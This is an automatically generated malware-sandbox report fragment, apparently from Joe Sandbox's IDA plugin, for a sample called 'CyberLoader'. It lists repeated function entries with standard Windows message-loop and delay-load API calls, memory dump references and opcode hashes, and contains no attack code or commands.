                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID:
                                                  • API String ID: 3081899298-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0028D43F
                                                    • Part of subcall function 0028AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028AC85
                                                    • Part of subcall function 0028AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028AC96
                                                    • Part of subcall function 0028AC74: IsDialogMessageW.USER32(00010464,?), ref: 0028ACAA
                                                    • Part of subcall function 0028AC74: TranslateMessage.USER32(?), ref: 0028ACB8
                                                    • Part of subcall function 0028AC74: DispatchMessageW.USER32(?), ref: 0028ACC2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                  • String ID:
                                                  • API String ID: 897784432-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: cd9563aecd7af5c416d5127f9bbc6e8073fc0b8c5484db36b64008a8ac2d4511
                                                  • Instruction ID: f2ced702017c57dcc9f4531189f4ac56e47a8e79dc06c02a000d48f9dbc22979
                                                  • Opcode Fuzzy Hash: cd9563aecd7af5c416d5127f9bbc6e8073fc0b8c5484db36b64008a8ac2d4511
                                                  • Instruction Fuzzy Hash: B4B012A927E402BD310C7115AC06E36031CC4D3B12330801BF10DD01C2D8809C3E5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 67d36eb7d73ac12c2cd7ed130643045c8826cdb0f794d843bd8707fac9d5bb18
                                                  • Instruction ID: 90d42d3077abc1e91131be848cc01de48bb66d542fafc29e40c26426476bb10d
                                                  • Opcode Fuzzy Hash: 67d36eb7d73ac12c2cd7ed130643045c8826cdb0f794d843bd8707fac9d5bb18
                                                  • Instruction Fuzzy Hash: 0CB012A927E401BD310C71146D06E36031CC4D3B12330801BF10DD01C2D8809D3F5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 19fc944c515948d112dc26277a7d3eddcb7a2d250f71d42a83961880f2120cc4
                                                  • Instruction ID: 10a6ea118b35d676c2438c0cba668f5ab36cb50485fe2ac960a786f331c9ae13
                                                  • Opcode Fuzzy Hash: 19fc944c515948d112dc26277a7d3eddcb7a2d250f71d42a83961880f2120cc4
                                                  • Instruction Fuzzy Hash: F3B0129927E401BD310C71146D06D36032CC4D3B12330C01BF10DD02C2D8809C3F5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 767a44acfafb5aa2044aaa0a44bc5b2ea0c34c8fb5568231b73dd829c425de26
                                                  • Instruction ID: 48a33f907bfd4cb5b5245e880c8389aff0fa82eaca0405ac0f7151ac3d8749af
                                                  • Opcode Fuzzy Hash: 767a44acfafb5aa2044aaa0a44bc5b2ea0c34c8fb5568231b73dd829c425de26
                                                  • Instruction Fuzzy Hash: 64B0129927E501BD314871146C06D36032CC4D3B12330C11BF10DD02C2D8809CBE5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 6a76e937ebcfefb97a0f99a768430d0978cb54796f7056262db855966faf761d
                                                  • Instruction ID: d4df3911df450ee9785cf13c482633b4bb6c4eb2ca198474c12c048a537d2e65
                                                  • Opcode Fuzzy Hash: 6a76e937ebcfefb97a0f99a768430d0978cb54796f7056262db855966faf761d
                                                  • Instruction Fuzzy Hash: FCB012A927E401BD310871146C06E36031CC4D3B12330C01BF50DD01C2D8809C3E5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ee06a2f4dd6671b21aec41f246d7e1aff53e6ff70e20b89a08166ba8055d4595
                                                  • Instruction ID: 70bb431f966a6681c8a7f896374f838e3f30325dc358b1faf056855db675210f
                                                  • Opcode Fuzzy Hash: ee06a2f4dd6671b21aec41f246d7e1aff53e6ff70e20b89a08166ba8055d4595
                                                  • Instruction Fuzzy Hash: 57B0129927E401BD310971246C07D36035CC8D3B12330C01BF60DD01C2D9809C3D5E31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ba120985b31fae6d2b6093b043e6b054e5431006e2d1b2d8a8e1e42cc73cda7c
                                                  • Instruction ID: 2df1729766d9ef2218bfef13630ba26274b1bc89379a59aaba3c6e0af0247f15
                                                  • Opcode Fuzzy Hash: ba120985b31fae6d2b6093b043e6b054e5431006e2d1b2d8a8e1e42cc73cda7c
                                                  • Instruction Fuzzy Hash: 6FB012A927F402BD310871146D06D36035DC8D3B12330801BF14DD01C2D8809C3D5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 62f5dd646c6b7952e68557b31c7e3e10aa602586b623a248661e5b51a5d6d4a6
                                                  • Instruction ID: f43fe7b8c25a11906739229e72ecd32edb6ea5f372fdd1c1e0008197094c161f
                                                  • Opcode Fuzzy Hash: 62f5dd646c6b7952e68557b31c7e3e10aa602586b623a248661e5b51a5d6d4a6
                                                  • Instruction Fuzzy Hash: 61B012A927F401BD310871146D06D36031DC4D3B12330C01BF54DD01C2D8809C3D5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: d36e6992accda23a2105316a81f19e5ddd5008ecf9de21689f6908695ff35290
                                                  • Instruction ID: b24dc51bc5afd8251621d76eb8c717d22a0580a9474c65fd151cb0ed8bbb563c
                                                  • Opcode Fuzzy Hash: d36e6992accda23a2105316a81f19e5ddd5008ecf9de21689f6908695ff35290
                                                  • Instruction Fuzzy Hash: F6B012B927F501BD314872546D06D36031DC4D3B12330811BF14DD01C2D8809C7D5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 8a4b7dcaad54097517c5681ea8cbae28c663061a03f7135f44bf2f26a2c1ff57
                                                  • Instruction ID: 5e9c514cda28f492b752afc7b417fe4e10da99776657a79bc8fe66e18916713b
                                                  • Opcode Fuzzy Hash: 8a4b7dcaad54097517c5681ea8cbae28c663061a03f7135f44bf2f26a2c1ff57
                                                  • Instruction Fuzzy Hash: 99B012A927E401BD310D71146D07D36039CC8D3B12330C01BF10DD01C2D8809C3E5E31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: bb643237a594bf77109c36984fe5d5e21468cb174c7c4f8ff2ad890cf0a7dee7
                                                  • Instruction ID: 3188237d6af08422bbee1d6cd2003ff454e8aad98e5904d192f76c1876533bc4
                                                  • Opcode Fuzzy Hash: bb643237a594bf77109c36984fe5d5e21468cb174c7c4f8ff2ad890cf0a7dee7
                                                  • Instruction Fuzzy Hash: 95B012AD27E001ED320C71066C02D3A035CC0E1B11330C11BF409C01C5D8844C3D9E31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DAB2
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
